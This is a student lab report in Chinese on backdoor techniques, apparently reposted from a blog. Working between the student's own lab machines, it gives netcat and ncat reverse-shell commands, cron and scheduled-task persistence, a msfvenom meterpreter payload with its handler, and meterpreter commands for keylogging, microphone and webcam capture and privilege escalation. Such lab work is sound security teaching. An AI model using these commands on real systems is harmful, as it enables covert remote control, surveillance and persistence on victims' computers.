20155301实验二 后门原理与实践

20155301实验二 后门原理与实践

基础问题

(1)例举你能想到的一个后门进入到你系统中的可能方式?

答:浏览网站所附带的软件,或者在不正规的下载网站下载软件。
(2)例举你知道的后门如何启动起来(win及linux)的方式?

答:通过开机自动运行脚本或者和程序绑定的方式运行。

(3)Meterpreter有哪些给你映像深刻的功能

答:抓取屏幕,打开摄像机和录像,感觉很恐怖。

(4)如何发现自己有系统有没有被安装后门

答:通过任务管理器查看有没有陌生的程序在运行,或者利用杀毒软件查杀。

实验内容

(1)使用netcat获取主机操作Shell,cron启动

(2)使用socat获取主机操作Shell, 任务计划启动

(3)使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell

(4)使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权

实验过程

预备任务:Windows获得Linux Shell、Linux获得Windows Shell

1.在Windows中需要载ncat.rar,解压后即可使用

2.利用命令行进入刚刚解压ncat的目录。

3.利用 ncat.exe -l -p 8888 命令打开端口号为8888的端口

4.利用nc 192.168.229.129 5301 -e /bin/sh 在Linux反弹连接windows。
1072918-20180401212903538-1998431029.png

1.Linux获得Windows Shell的过程同理,在Linux运行监听指令:nc -l -p 7777 打开端口

2.利用ncat.exe -e cmd.exe 192.229.229.130 指令Windows反弹连接Linux

1072918-20180401212913513-996133123.png

任务一:使用netcat获取主机操作Shell,cron启动

1.首先在Windows中下载scat,解压

2.使用crontab -e命令编辑配置文件,在最后一行或第一行添加指令04 * * * * /bin/netcat 192.168.229.130 5301 -e /bin/sh
1072918-20180401212922684-561605997.png

任务二:使用socat获取主机操作Shell, 任务计划启动

1.在windows中,右键单击计算机,打开管理->系统工具->任务计划程序,单击创建基本任务,填写任务名称,设置触发器为当前用户登录时,设置操作为启动程序,选择启动程序为socat.exe,参数设置为tcp-listen:5301 exec:cmd.exe,pty,stderr

这步操作的作用是把cmd绑定到端口5212,同时把cmd的Stderr复位向到stdout

1072918-20180401212932351-2070936825.png

2.注销当前用户,并重新登录,之前创建的程序和设置的参数会自动填入运行
1072918-20180401212940710-57009593.png

任务三:使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell

1.在kali中利用如下命令创建一个名为5301的后门程序

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.229.129 LPORT=5301 -f exe > 20155301.exe

1072918-20180401212952426-1401002538.png

2.将其通过ncat,传送到主机,在Windows中使用命令ncat.exe -l 5301 > 20155301.exe,在Kali中使用命令:nc 192.168.229.130 5301 < 20155301.exe,这样就传送过来了。

3.MSF打开监听,输入如下指令

root@5301:~# msfconsole
msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set LHOST 192.168.229.130
msf exploit(multi/handler) > set LPORT 4444
msf exploit(multi/handler) > show options
msf exploit(multi/handler) > exploit

1072918-20180401213003370-1035383697.png

4.在win7打开生成5301.exe的程序,回到kali,终端提示
1072918-20180401213013831-465002630.png

5.尝试使用命令dir,成功显示windows中的文件夹
1072918-20180401213026111-1935935686.png

任务四:使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权

命令用途
keyscan_start启动键盘记录
keyscan_dump键盘记录软件的内容转储
keyscan_stop停止键盘记录软件
record_mic使用默认麦克风录音
webcam_snap拍照
webcam_stream录像
getsystem提权

获取主机音频
获取击键记录
1072918-20180401213205573-545285302.png

实验总结与体会

这次实验并不困难,但是所达到的效果非常让我震惊,没有想到这么简单就可以进入别人的电脑并且获取你屏幕的截图甚至录像等等,这使我更加认识到了学好专业的重要性,也是我意识到网络中充斥的各种后门木马,在今后的上网或者下载中会更加的谨慎,也更加的重视定期杀毒的重要性。

转载于:https://www.cnblogs.com/fengxingck/p/8688427.html

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值